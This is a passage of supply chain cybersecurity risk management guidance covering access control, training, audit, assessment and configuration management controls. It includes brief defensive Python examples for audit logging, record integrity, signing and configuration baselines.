supply chain enables the protection of the information systems and components, as well as logistics
technologies and metadata used during shipping (e.g., within tracking sensors). The enterprise should
explicitly define appropriate wireless access control mechanisms for the supply chain in policy and
implement appropriate mechanisms.
Level(s): 1, 2, 3
AC-19 ACCESS CONTROL FOR MOBILE DEVICES
Supplemental C-SCRM Guidance: The use of mobile devices (e.g., laptops, tablets, e-readers, smartphones,
smartwatches) has become common in the supply chain. They are used in direct support of an enterprise’s
operations as well as for tracking and supply chain logistics data, and they serve as information systems
and components that traverse enterprise or system integrator supply chains. Ensure that access control
mechanisms are clearly
defined and implemented where relevant when managing enterprise supply chain components. An example
of such an implementation includes access control mechanisms implemented for use with remote handheld
units in RFID for tracking components that traverse the supply chain. Access control mechanisms should
also be implemented on any associated data and metadata tied to the devices.
Level(s): 2, 3
AC-20 USE OF EXTERNAL SYSTEMS
Supplemental C-SCRM Guidance: Enterprises’ external information systems include those of suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related service
providers. Unlike in an acquirer’s internal enterprise where direct and continuous monitoring is possible, in
the external supplier relationship, information may be shared on an as-needed basis and should be
articulated in an agreement. Access to the supply chain from such external information systems should be
monitored and audited. Enterprises should require their prime contractors to implement this control and
flow down this requirement to relevant sub-tier contractors.
Level(s): 1, 2, 3
Control Enhancement(s):
USE OF EXTERNAL SYSTEMS | LIMITS ON AUTHORIZED USE
Supplemental C-SCRM Guidance: This enhancement helps limit exposure of the supply chain to the
systems of suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers.
Level(s): 2, 3
USE OF EXTERNAL SYSTEMS | NON-ORGANIZATIONALLY OWNED SYSTEMS — RESTRICTED USE
Supplemental C-SCRM Guidance: Devices that do not belong to the enterprise (e.g., bring your own
device [BYOD] policies) increase the enterprise’s exposure to cybersecurity risks throughout the
supply chain. This includes devices used by suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers. Enterprises should review the use of
non-enterprise devices by non-enterprise personnel and make a risk-based decision as to whether to
allow the use of such devices or to furnish devices. Enterprises should furnish devices to those non-
enterprise personnel whose use of their own devices would present unacceptable levels of risk.
Level(s): 2, 3
AC-21 INFORMATION SHARING
Supplemental C-SCRM Guidance: Sharing information within the supply chain can help manage
cybersecurity risks throughout the supply chain. This information may include vulnerabilities, threats, the
criticality of systems and components, or delivery information. This information sharing should be
carefully managed to ensure that the information is only accessible to authorized individuals within the
enterprise’s supply chain. Enterprises should clearly define boundaries for information sharing with respect
to temporal, informational, contractual, security, access, system, and other requirements. Enterprises should
monitor and review for unintentional or intentional information sharing within their supply chain activities,
including information sharing with suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers.
Level(s): 1, 2
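
One way to operationalize such sharing boundaries is a per-role allow-list that releases only the
fields a given supply chain participant requires. The following minimal sketch (Python, with
hypothetical roles and field names) is illustrative only.

    # Hypothetical per-role allow-lists: each supply chain participant sees
    # only the fields its role requires. Roles and field names are illustrative.
    ALLOWED_FIELDS = {
        "supplier":     {"part_number", "quantity", "delivery_date"},
        "external_svc": {"ticket_id", "severity"},
    }

    def release_view(record: dict, role: str) -> dict:
        """Return only the fields the given role is authorized to receive."""
        allowed = ALLOWED_FIELDS.get(role, set())
        return {k: v for k, v in record.items() if k in allowed}

    order = {"part_number": "A-100", "quantity": 50, "delivery_date": "2025-10-01",
             "unit_cost": 12.40, "program_name": "internal-only"}
    print(release_view(order, "supplier"))
    # {'part_number': 'A-100', 'quantity': 50, 'delivery_date': '2025-10-01'}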
AC-22 PUBLICLY ACCESSIBLE CONTENT
Supplemental C-SCRM Guidance: Within the C-SCRM context, publicly accessible content may include
Requests for Information, Requests for Proposal, or information about delivery of systems and components.
This information should be reviewed to ensure that only appropriate content is released for public
consumption, whether alone or with other information.
Level(s): 2, 3
AC-23 DATA MINING PROTECTION
Supplemental C-SCRM Guidance: Enterprises should require their prime contractors to implement this
control as part of their insider threat activities and flow down this requirement to relevant sub-tier
contractors.
Level(s): 2, 3
AC-24 ACCESS CONTROL DECISIONS
Supplemental C-SCRM Guidance: Enterprises should assign access control decisions to support authorized
access to the supply chain. Ensure that if a system integrator or external service provider is used, there is
consistency in access control decision requirements and how the requirements are implemented. This may
require defining such requirements in service-level agreements, in many cases as part of the upfront
relationship established between the enterprise and system integrator or the enterprise and external service
provider. Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 1, 2, 3
FAMILY: AWARENESS AND TRAINING
[FIPS 200] specifies the Awareness and Training minimum security requirement as follows:
Organizations must: (i) ensure that managers and users of organizational information
systems are made aware of the security risks associated with their activities and of the
applicable laws, Executive Orders, directives, policies, standards, instructions,
regulations, or procedures related to the security of organizational information systems;
and (ii) ensure that organizational personnel are adequately trained to carry out their
assigned information security-related duties and responsibilities.
This document expands the Awareness and Training control of [FIPS 200] to include C-SCRM.
Making the workforce aware of C-SCRM concerns is key to a successful C-SCRM strategy. C-
SCRM awareness and training provides understanding of the problem space and the appropriate
processes and controls that can help mitigate cybersecurity risks throughout the supply chain.
Enterprises should provide C-SCRM awareness and training to individuals at all levels within the
enterprise, including information security, procurement, enterprise risk management,
engineering, software development, IT, legal, HR, and others. Enterprises should also work with
suppliers, developers, system integrators, external system service providers, and other ICT/OT-
related service providers to ensure that the personnel who interact with an enterprise’s supply
chains receive C-SCRM awareness and training, as appropriate.
AT-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises should designate a specific official to manage the
development, documentation, and dissemination of the training policy and procedures, including C-SCRM
and role-based specific training for those with supply chain responsibilities. Enterprises should integrate
cybersecurity supply chain risk management training and awareness into the security training and
awareness policy. C-SCRM training should target both the enterprise and its contractors. The policy should
ensure that supply chain cybersecurity role-based training is required for those individuals or functions that
touch or impact the supply chain, such as the information system owner, acquisition, supply chain logistics,
system engineering, program management, IT, quality, and incident response.
C-SCRM training procedures should address:
a. Roles throughout the supply chain and system/element life cycle to limit the opportunities and
means available to individuals performing these roles that could result in adverse consequences,
b. Requirements for interaction between an enterprise’s personnel and individuals not employed by
the enterprise who participate in the supply chain throughout the SDLC, and
c. Incorporating feedback and lessons learned from C-SCRM activities into the C-SCRM training.
Level(s): 1, 2
AT-2
LITERACY TRAINING AND AWARENESS
Supplemental C-SCRM Guidance: C-SCRM-specific supplemental guidance is provided in the control
enhancements. Departments and agencies should refer to Appendix F to implement this guidance in
accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Control Enhancements:
LITERACY TRAINING AND AWARENESS | PRACTICAL EXERCISES
Supplemental C-SCRM Guidance: Enterprises should provide practical exercises in literacy training
that simulate supply chain cybersecurity events and incidents. Enterprises should require their prime
contractors to implement this control and flow down this requirement to relevant sub-level contractors.
LITERACY TRAINING AND AWARENESS | INSIDER THREAT
Supplemental C-SCRM Guidance: Enterprises should provide literacy training on recognizing and
reporting potential indicators of insider threat within the supply chain. Enterprises should require their
prime contractors to implement this control and flow down this requirement to relevant sub-tier
contractors.
LITERACY TRAINING AND AWARENESS | SOCIAL ENGINEERING AND MINING
Supplemental C-SCRM Guidance: Enterprises should provide literacy training on recognizing and
reporting potential and actual instances of supply chain-related social engineering and social mining.
Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-level contractors.
LITERACY TRAINING AND AWARENESS | SUSPICIOUS COMMUNICATIONS AND ANOMALOUS
SYSTEM BEHAVIOR
Supplemental C-SCRM Guidance: Provide literacy training on recognizing suspicious communications
or anomalous behavior in enterprise supply chain systems. Enterprises should require their prime
contractors to implement this control and flow down this requirement to relevant sub-level contractors.
LITERACY TRAINING AND AWARENESS | ADVANCED PERSISTENT THREAT
Supplemental C-SCRM Guidance: Provide literacy training on recognizing indicators of an advanced
persistent threat (APT) in the enterprise’s supply chain. Enterprises should require
their prime contractors to implement this control and flow down this requirement to relevant sub-level
contractors.
LITERACY TRAINING AND AWARENESS | CYBER THREAT ENVIRONMENT
Supplemental C-SCRM Guidance: Provide literacy training on cyber threats specific to the enterprise’s
supply chain environment. Enterprises should require their prime contractors to implement this control
and flow down this requirement to relevant sub-level contractors.
Level(s): 2
AT-3
ROLE-BASED TRAINING
Supplemental C-SCRM Guidance: Addressing cyber supply chain risks throughout the acquisition process
is essential to performing C-SCRM effectively. Personnel who are part of the acquisition workforce require
training on what C-SCRM requirements, clauses, and evaluation factors are necessary to include when
conducting procurement and how to incorporate C-SCRM into each acquisition phase. Similar enhanced
training requirements should be tailored for personnel responsible for conducting threat assessments.
Responding to threats and identified risks requires training in counterintelligence awareness and reporting.
Enterprises should ensure that developers receive training on secure development practices as well as the
use of vulnerability scanning tools. Enterprises should require their prime contractors to implement this
control and flow down this requirement to relevant sub-tier contractors. Departments and agencies should
refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
Control Enhancement(s):
ROLE-BASED TRAINING | PHYSICAL SECURITY CONTROLS
Supplemental C-SCRM Guidance: C-SCRM is impacted by a number of physical security mechanisms
and procedures within the supply chain, such as manufacturing, shipping, receiving, physical access to
facilities, inventory management, and warehousing. Enterprise and system integrator personnel who
provide development and operational support to the enterprise should receive training on how to
handle these physical security mechanisms and on the associated cybersecurity risks throughout the
supply chain.
Level(s): 2
ROLE-BASED TRAINING | COUNTERINTELLIGENCE TRAINING
Supplemental C-SCRM Guidance: Public sector enterprises should provide specialized
counterintelligence awareness training that enables their personnel to collect, interpret, and act upon a
range of data sources that may signal a foreign adversary’s presence in the supply chain. At a
minimum, counterintelligence training should cover known red flags, key information sharing
concepts, and reporting requirements.
Level(s): 2
AT-4
TRAINING RECORDS
Supplemental C-SCRM Guidance: Enterprises should maintain documentation for C-SCRM-specific
training, especially with regard to key personnel in acquisitions and counterintelligence.
Level(s): 2
FAMILY: AUDIT AND ACCOUNTABILITY
[FIPS 200] specifies the Audit and Accountability minimum security requirement as follows:
Organizations must: (i) create, protect, and retain information system audit records to
the extent needed to enable the monitoring, analysis, investigation, and reporting of
unlawful, unauthorized, or inappropriate information system activity; and (ii) ensure
that the actions of individual information system users can be uniquely traced to those
users so they can be held accountable for their actions.
Audit and accountability controls for C-SCRM provide information that is useful in the event of
a supply chain cybersecurity incident or compromise. Enterprises should ensure that they
designate and audit cybersecurity supply chain-relevant events within their information system
boundaries using appropriate audit mechanisms (e.g., system logs, Intrusion Detection System
[IDS] logs, firewall logs, paper reports, forms, clipboard checklists, digital records). These audit
mechanisms should also be configured to work within a reasonable time frame, as defined by
enterprise policy. Enterprises may encourage their system suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers to do
the same and may include requirements for such monitoring in agreements. However, enterprises
should not deploy audit mechanisms on systems outside of their enterprise boundary, including
those of suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers.
AU-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises must designate a specific official to manage the
development, documentation, and dissemination of the audit and accountability policy and procedures to
include auditing of the supply chain information systems and network. The audit and accountability policy
and procedures should appropriately address tracking activities and their availability for various other
supply chain activities, such as configuration management. The activities of suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers should not be
included in such a policy unless those functions are performed within the acquirer’s supply chain
information systems and network. Audit and accountability policies and procedures should appropriately address
supplier audits as a way to examine the quality of a particular supplier and the risk they present to the
enterprise and the enterprise’s supply chain.
Level(s): 1, 2, 3
AU-2
EVENT LOGGING
Supplemental C-SCRM Guidance: An observable occurrence within the information system or supply
chain network should be identified as a supply chain auditable event based on the enterprise’s SDLC
context and requirements. Auditable events may include software/hardware changes, failed attempts to
access supply chain information systems, or the movement of source code. Information on such events
should be captured by appropriate audit mechanisms and be traceable and verifiable. Information captured
may include the type of event, date/time, length, and the frequency of occurrence. Among other things,
auditing may help detect misuse of the supply chain information systems or network caused by insider
threats. Logs are a key resource when identifying operational trends and long-term problems. As such,
enterprises should incorporate log reviews at the contract renewal point for vendors to determine
whether there is a systemic problem. Enterprises should require their prime contractors to implement this
control and flow down this requirement to relevant sub-tier contractors. Departments and agencies should
refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
Level(s): 1, 2, 3
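
For illustration only, the following minimal Python sketch shows one way to capture a supply chain auditable event with the attributes noted above (type, date/time, and the affected subject) so that the record is traceable and verifiable. The function and field names are hypothetical and not part of this control.

    import hashlib
    import json
    from datetime import datetime, timezone

    def record_supply_chain_event(log_path, event_type, subject, detail):
        """Append one supply chain auditable event (e.g., a failed access
        attempt or a movement of source code) as a JSON line, with a
        digest over the canonical record to support later verification."""
        event = {
            "type": event_type,    # e.g., "SOFTWARE_CHANGE"
            "subject": subject,    # affected system or component
            "detail": detail,
            "timestamp": datetime.now(timezone.utc).isoformat(),
        }
        canonical = json.dumps(event, sort_keys=True).encode()
        event["sha256"] = hashlib.sha256(canonical).hexdigest()
        with open(log_path, "a", encoding="utf-8") as log:
            log.write(json.dumps(event) + "\n")
        return event

    # Example: log the staging of a vendor patch as an auditable event.
    record_supply_chain_event("supply_chain_audit.log", "SOFTWARE_CHANGE",
                              "inventory-service",
                              "vendor patch 2.4.1 staged for review")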
AU-3 CONTENT OF AUDIT RECORDS
Supplemental C-SCRM Guidance: The audit records of a supply chain event should be securely handled
and maintained in a manner that conforms to record retention requirements and preserves the integrity of
the findings and the confidentiality of the record information and its sources as appropriate. In certain
instances, such records may be used in administrative or legal proceedings. Enterprises should require their
prime contractors to implement this control and flow down this requirement to relevant sub-tier contractors.
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
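
One common technique for preserving the integrity of audit findings, offered here only as an illustrative sketch rather than a requirement of this control, is to chain record digests so that altering any earlier record invalidates every later one. All names are hypothetical.

    import hashlib
    import json

    GENESIS = "0" * 64

    def chain_records(records):
        """Link audit records by hashing each record together with the
        previous digest, a simple tamper-evidence technique."""
        chained, prev = [], GENESIS
        for record in records:
            body = json.dumps(record, sort_keys=True)
            digest = hashlib.sha256((prev + body).encode()).hexdigest()
            chained.append({"record": record, "prev": prev, "digest": digest})
            prev = digest
        return chained

    def verify_chain(chained):
        """Recompute every digest; False means some record was altered."""
        prev = GENESIS
        for entry in chained:
            body = json.dumps(entry["record"], sort_keys=True)
            expected = hashlib.sha256((prev + body).encode()).hexdigest()
            if entry["prev"] != prev or entry["digest"] != expected:
                return False
            prev = expected
        return True

    log = chain_records([{"event": "patch received"},
                         {"event": "patch approved"}])
    assert verify_chain(log)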
AU-6 AUDIT REVIEW, ANALYSIS, AND REPORTING
Supplemental C-SCRM Guidance: The enterprise should ensure that both supply chain and information
security auditable events are appropriately filtered and correlated for analysis and reporting. For example, if
new maintenance or a patch upgrade is recognized to have an invalid digital signature, the identification of
the patch arrival qualifies as a supply chain auditable event, while an invalid signature is an information
security auditable event. The combination of these two events may provide information valuable to C-
SCRM. The enterprise should adjust the level of audit record review based on the risk changes (e.g., active
threat intel, risk profile) on a specific vendor. Contracts should explicitly address how audit findings will be
reported and adjudicated.
Level(s): 2, 3
Control Enhancement(s):
AUDIT REVIEW, ANALYSIS, AND REPORTING | CORRELATION WITH INFORMATION FROM NONTECHNICAL SOURCES
Supplemental C-SCRM Guidance: In a C-SCRM context, non-technical sources include changes to the
enterprise’s security or operational policy, changes to the procurement or contracting processes, and
notifications from suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers regarding plans to update, enhance, patch, or retire/dispose of a
system/component.
Level(s): 3
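
The AU-6 guidance above gives the example of pairing a supply chain auditable event (the arrival of a patch) with an information security auditable event (an invalid digital signature). As a purely illustrative sketch with hypothetical field names, such a correlation might look like the following.

    from datetime import datetime, timedelta

    def correlate(supply_chain_events, security_events, window_minutes=60):
        """Pair supply chain events with information security events that
        reference the same component within a time window, producing
        combined findings for C-SCRM analysis and reporting."""
        window = timedelta(minutes=window_minutes)
        findings = []
        for sc in supply_chain_events:
            for sec in security_events:
                if (sc["component"] == sec["component"]
                        and abs(sc["time"] - sec["time"]) <= window):
                    findings.append({
                        "component": sc["component"],
                        "supply_chain_event": sc["type"],
                        "security_event": sec["type"],
                        "action": "hold update pending review",
                    })
        return findings

    now = datetime.now()
    print(correlate(
        [{"component": "fw-2.4.1", "type": "PATCH_ARRIVAL", "time": now}],
        [{"component": "fw-2.4.1", "type": "INVALID_SIGNATURE",
          "time": now + timedelta(minutes=5)}]))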
AU-10 NON-REPUDIATION
Supplemental C-SCRM Guidance: Enterprises should implement non-repudiation techniques to protect the
originality and integrity of both information systems and the supply chain network. Examples of what may
require non-repudiation include supply chain metadata that describes the components, supply chain
communication, and delivery acceptance information. For information systems, examples may include
patch or maintenance upgrades for software as well as component replacements in a large hardware system.
Verifying that such components originate from the OEM is part of non-repudiation.
Level(s): 3
Control Enhancement(s):
NON-REPUDIATION | ASSOCIATION OF IDENTITIES
Supplemental C-SCRM Guidance: This enhancement helps traceability in the supply chain and
facilitates the accuracy of provenance.
Level(s): 2
NON-REPUDIATION | VALIDATE BINDING OF INFORMATION PRODUCER IDENTITY
Supplemental C-SCRM Guidance: This enhancement validates the relationship of provenance and a
component within the supply chain. Therefore, it ensures integrity of provenance.
Level(s): 2, 3
NON-REPUDIATION | CHAIN OF CUSTODY
Supplemental C-SCRM Guidance: Chain of custody is fundamental to provenance and traceability in
the supply chain. It also helps the verification of system and component integrity.
Level(s): 2, 3
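
For illustration of the non-repudiation techniques described under AU-10, the following minimal sketch signs supply chain metadata with an Ed25519 key so that the producer cannot later deny authorship. It assumes the third-party Python "cryptography" package, and the metadata content is hypothetical.

    # Assumes the third-party "cryptography" package (pip install cryptography).
    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives.asymmetric.ed25519 import (
        Ed25519PrivateKey,
    )

    # The producer (e.g., a supplier) signs the metadata; the consumer
    # verifies it with the producer's public key.
    private_key = Ed25519PrivateKey.generate()
    public_key = private_key.public_key()

    metadata = b'{"component": "router-fw", "version": "2.4.1", "origin": "OEM"}'
    signature = private_key.sign(metadata)

    try:
        public_key.verify(signature, metadata)   # raises if altered
        print("metadata is authentic and unaltered")
    except InvalidSignature:
        print("reject: signature does not match metadata")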
AU-12 AUDIT RECORD GENERATION
Supplemental C-SCRM Guidance: Enterprises should ensure that audit record generation mechanisms are
in place to capture all relevant supply chain auditable events. Examples of such events include component
version updates, component approvals from acceptance testing results, logistics data-capturing inventory,
or transportation information. Enterprises should require their prime contractors to implement this control
and flow down this requirement to relevant sub-tier contractors. Departments and agencies should refer to
Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
AU-13 MONITORING FOR INFORMATION DISCLOSURE
Supplemental C-SCRM Guidance: Within the C-SCRM context, information disclosure may occur via
multiple avenues, including open source information. For example, supplier-provided errata may reveal
information about an enterprise’s system that increases the risk to that system. Enterprises should ensure
that monitoring is in place for contractor systems to detect the unauthorized disclosure of any data and that
contract language includes a requirement that the vendor will notify the enterprise, in accordance with
enterprise-defined time frames and as soon as possible in the event of any potential or actual unauthorized
disclosure. Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
AU-14 SESSION AUDIT
Supplemental C-SCRM Guidance: Enterprises should include non-federal contract employees in session
audits to identify security risks in the supply chain. Enterprises should require their prime contractors to
implement this control and flow down this requirement to relevant sub-tier contractors. Departments and
agencies should refer to Appendix F to implement this guidance in accordance with Executive Order
14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
AU-16 CROSS-ORGANIZATIONAL AUDIT LOGGING
Supplemental C-SCRM Guidance: In a C-SCRM context, this control includes the enterprise’s use of
system integrator or external service provider infrastructure. Enterprises should add language to contracts
on coordinating audit information requirements and information exchange agreements with vendors.
Level(s): 2, 3
Control Enhancement(s):
CROSS-ORGANIZATIONAL AUDIT LOGGING | SHARING OF AUDIT INFORMATION
Supplemental C-SCRM Guidance: Whether managing a distributed audit environment or an audit data-
sharing environment between an enterprise and its system integrators or external service providers,
enterprises should establish a set of requirements for the process of sharing audit information. The
enterprise and its system integrators or external service providers must agree in advance, through a
service-level agreement, on the type of audit data required versus what can be provided so that the
enterprise obtains the audit information it needs to verify that appropriate protections are in place to
meet its mission and operational protection needs. Coverage of both the information systems and the
supply chain network should be addressed in the collection and sharing of audit information.
Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 2, 3
FAMILY: ASSESSMENT, AUTHORIZATION, AND MONITORING
[FIPS 200] specifies the Certification, Accreditation, and Security Assessments minimum
security requirement as follows:
Organizations must: (i) periodically assess the security controls in organizational
information systems to determine if the controls are effective in their application; (ii)
develop and implement plans of action designed to correct deficiencies and reduce or
eliminate vulnerabilities in organizational information systems; (iii) authorize the
operation of organizational information systems and any associated information system
connections; and (iv) monitor information system security controls on an ongoing basis
to ensure the continued effectiveness of the controls.
Enterprises should integrate C-SCRM – including the supply chain risk management process
and the use of relevant controls defined in this publication – into ongoing security assessment
and authorization activities. This includes activities to assess and authorize an enterprise’s
information systems, as well as external assessments of suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers,
where appropriate. Supply chain aspects include documentation, the tracking of chain of
custody and system interconnections within and between enterprises, the verification of supply
chain cybersecurity training, the verification of suppliers’ claims of conformance to security,
product/component integrity, and validation tools and techniques for non-invasive approaches
to detecting counterfeits or malware (e.g., Trojans) using inspection for genuine components,
including manual inspection techniques.
CA-1 POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Integrate the development and implementation of assessment and
authorization policies and procedures for supply chain cybersecurity into the control assessment and
authorization policy and related C-SCRM Strategy/Implementation Plan(s), policies, and system-level
plans. To address cybersecurity risks throughout the supply chain, enterprises should develop a C-SCRM
policy (or, if required, integrate into existing policies) to direct C-SCRM activities for control assessment
and authorization. The C-SCRM policy should define C-SCRM roles and responsibilities within the
enterprise for conducting control assessment and authorization, any dependencies among those roles, and
the interaction among the roles. Enterprise-wide security and privacy risks should be assessed on an
ongoing basis and include supply chain risk assessment results.
Level(s): 1, 2, 3
CA-2 CONTROL ASSESSMENTS
Supplemental C-SCRM Guidance: Ensure that the control assessment plan incorporates relevant C-SCRM
controls and control enhancements. The control assessment should cover the assessment of both
information systems and the supply chain and ensure that an enterprise-relevant baseline set of controls and
control enhancements are identified and used for the assessment. Control assessments can include
information from supplier audits, reviews, and supply chain-related information. Enterprises should
develop a strategy for collecting information, including a strategy for engaging with providers on supply
chain risk assessments. Such collaboration helps enterprises leverage information from providers, reduce
redundancy, identify potential courses of action for risk responses, and reduce the burden on providers. C-
SCRM personnel should review the control assessment.
Level(s): 2, 3
Control Enhancement(s):
CONTROL ASSESSMENTS | SPECIALIZED ASSESSMENTS
Supplemental C-SCRM Guidance: Enterprises should use a variety of assessment techniques and
methodologies, such as continuous monitoring, insider threat assessment, and malicious user
assessment. These assessment mechanisms are context-specific and require the enterprise to
understand its supply chain and to define the required set of measures for assessing and verifying that
appropriate protections have been implemented.
Level(s): 3
CONTROL ASSESSMENTS | LEVERAGING RESULTS FROM EXTERNAL ORGANIZATIONS
Supplemental C-SCRM Guidance: For C-SCRM, enterprises should use external security assessments
for suppliers, developers, system integrators, external system service providers, and other ICT/OT-
related service providers. External assessments include certifications, third-party assessments, and – in
the federal context – prior assessments performed by other departments and agencies. Certifications
from the International Organization for Standardization (ISO), the National Information Assurance
Partnership (Common Criteria), and the Open Group Trusted Technology Forum (OTTF) may also be
used by non-federal and federal enterprises alike, if such certifications meet agency needs.
Level(s): 3
CA-3 INFORMATION EXCHANGE
Supplemental C-SCRM Guidance: The exchange of information or data between the system and other
systems requires scrutiny from a supply chain perspective. This includes understanding the interface
characteristics and connections of those components/systems that are directly interconnected or the data
that is shared through those components/systems with developers, system integrators, external system
service providers, other ICT/OT-related service providers, and – in some cases – suppliers. Proper service-
level agreements should be in place to ensure compliance to system information exchange requirements
defined by the enterprise, as the transfer of information between systems in different security or privacy
domains with different security or privacy policies introduces the risk that such transfers violate one or
more domain security or privacy policies. Examples of such interconnections can include:
a. A shared development and operational environment between the enterprise and system integrator
b. Product update/patch management connection to an off-the-shelf supplier
c. Data request and retrieval transactions in a processing system that resides on an external service provider shared environment
Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 3
CA-5 PLAN OF ACTION AND MILESTONES
Supplemental C-SCRM Guidance: For system-level plans of action and milestones (POA&Ms),
enterprises need to ensure that a separate POA&M exists for C-SCRM and includes both information
systems and the supply chain. The C-SCRM POA&M should include tasks to be accomplished with a
recommendation for completion before or after system authorization, the resources required to accomplish
the tasks, milestones established to meet the tasks, and the scheduled completion dates for the milestones
and tasks. The enterprise should include relevant weaknesses, the impact of weaknesses on information
systems or the supply chain, any remediation to address weaknesses, and any continuous monitoring
activities in its C-SCRM POA&M. The C-SCRM POA&M should be included as part of the authorization
package.
Level(s): 2, 3
CA-6 AUTHORIZATION
Supplemental C-SCRM Guidance: Authorizing officials should include C-SCRM in authorization
decisions. To accomplish this, supply chain risks and compensating controls documented in C-SCRM Plans
or system security plans and the C-SCRM POA&M should be included in the authorization package as part
of the decision-making process. Risks should be determined and associated compensating controls selected
based on the output of criticality, threat, and vulnerability analyses. Authorizing officials may use the
guidance in Section 2 of this document as well as NISTIR 8179 to guide the assessment process.
Level(s): 1, 2, 3
CA-7 CONTINUOUS MONITORING
Supplemental C-SCRM Guidance: For C-SCRM-specific guidance on this control, see Section 2 of this
publication. Departments and agencies should refer to Appendix F to implement this guidance in
accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
Control Enhancement(s):
CONTINUOUS MONITORING | TREND ANALYSES
Supplemental C-SCRM Guidance: The information gathered during continuous monitoring/trend
analyses serves as input into C-SCRM decisions, including criticality analysis, vulnerability and threat
analysis, and risk assessments. It also provides information that can be used in incident response and
potentially identify a supply chain cybersecurity compromise, including an insider threat.
Level(s): 3
FAMILY: CONFIGURATION MANAGEMENT
[FIPS 200] specifies the Configuration Management minimum security requirement as follows:
Organizations must: (i) establish and maintain baseline configurations and inventories
of organizational information systems (including hardware, software, firmware, and
documentation) throughout the respective system development life cycles; and (ii)
establish and enforce security configuration settings for information technology
products employed in organizational information systems.
Configuration Management helps track changes made throughout the SDLC to systems,
components, and documentation within the information systems and networks. This is important
for knowing what changes were made to those systems, components, and documentation; who
made the changes; and who authorized the changes. Configuration management also provides
evidence for investigations of supply chain cybersecurity compromise when determining which
changes were authorized and which were not. Enterprises should apply configuration
management controls to their own systems and encourage the use of configuration management
controls by their suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers. See NISTIR 7622 for more information on
Configuration Management.
CM-1 POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Configuration management impacts nearly every aspect of the supply
chain. Configuration management is critical to the enterprise’s ability to establish the provenance of
components, including tracking and tracing them through the SDLC and the supply chain. A properly
defined and implemented configuration management capability provides greater assurance throughout the
SDLC and the supply chain that components are authentic and have not been inappropriately modified.
When defining a configuration management policy and procedures, enterprises should address the full
SDLC, including procedures for introducing and removing components to and from the enterprise’s
information system boundary. A configuration management policy should incorporate configuration items,
data retention for configuration items and corresponding metadata, and tracking of the configuration item
and its metadata. The enterprise should coordinate with suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers regarding the configuration
management policy.
Level(s): 1, 2, 3
CM-2 BASELINE CONFIGURATION
Supplemental C-SCRM Guidance: Enterprises should establish a baseline configuration of both the
information system and the development environment, including documenting, formally reviewing, and
securing the agreement of stakeholders. The purpose of the baseline is to provide a starting point for
tracking changes to components, code, and/or settings throughout the SDLC. Regular reviews and updates
of baseline configurations (i.e., re-baselining) are critical for traceability and provenance. The baseline
configuration must take into consideration the enterprise’s operational environment and any relevant
supplier, developer, system integrator, external system service provider, and other ICT/OT-related service
provider involvement with the organization’s information systems and networks. If the system integrator,
for example, uses the existing organization’s infrastructure, appropriate measures should be taken to
establish a baseline that reflects an appropriate set of agreed-upon criteria for access and operation.
Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
BASELINE CONFIGURATION | DEVELOPMENT AND TEST ENVIRONMENTS
Supplemental C-SCRM Guidance: The enterprise should maintain or require the maintenance of a
baseline configuration of applicable suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers’ development, test (and staging, if applicable)
environments, and any configuration of interfaces.
Level(s): 2, 3
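
As an illustrative sketch of the baseline-and-track idea in CM-2 (not a prescribed mechanism), the following Python records the hash of every file in a configuration tree and later reports deviations from that baseline. Paths and names are hypothetical.

    import hashlib
    import json
    from pathlib import Path

    def _hash_tree(root):
        """Map each file under `root` to its SHA-256 digest."""
        root = Path(root)
        return {str(p.relative_to(root)):
                hashlib.sha256(p.read_bytes()).hexdigest()
                for p in sorted(root.rglob("*")) if p.is_file()}

    def snapshot_baseline(root, baseline_file):
        """Record the agreed-upon baseline configuration as JSON."""
        baseline = _hash_tree(root)
        Path(baseline_file).write_text(json.dumps(baseline, indent=2))
        return baseline

    def diff_against_baseline(root, baseline_file):
        """Report files added, removed, or modified since the baseline."""
        baseline = json.loads(Path(baseline_file).read_text())
        current = _hash_tree(root)
        return {
            "added": sorted(set(current) - set(baseline)),
            "removed": sorted(set(baseline) - set(current)),
            "modified": sorted(f for f in current
                               if f in baseline and current[f] != baseline[f]),
        }

    # snapshot_baseline("/etc/myapp", "baseline.json")
    # print(diff_against_baseline("/etc/myapp", "baseline.json"))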
CM-3 CONFIGURATION CHANGE CONTROL
Supplemental C-SCRM Guidance: Enterprises should determine, implement, monitor, and audit
configuration settings and change controls within the information systems and networks and throughout the
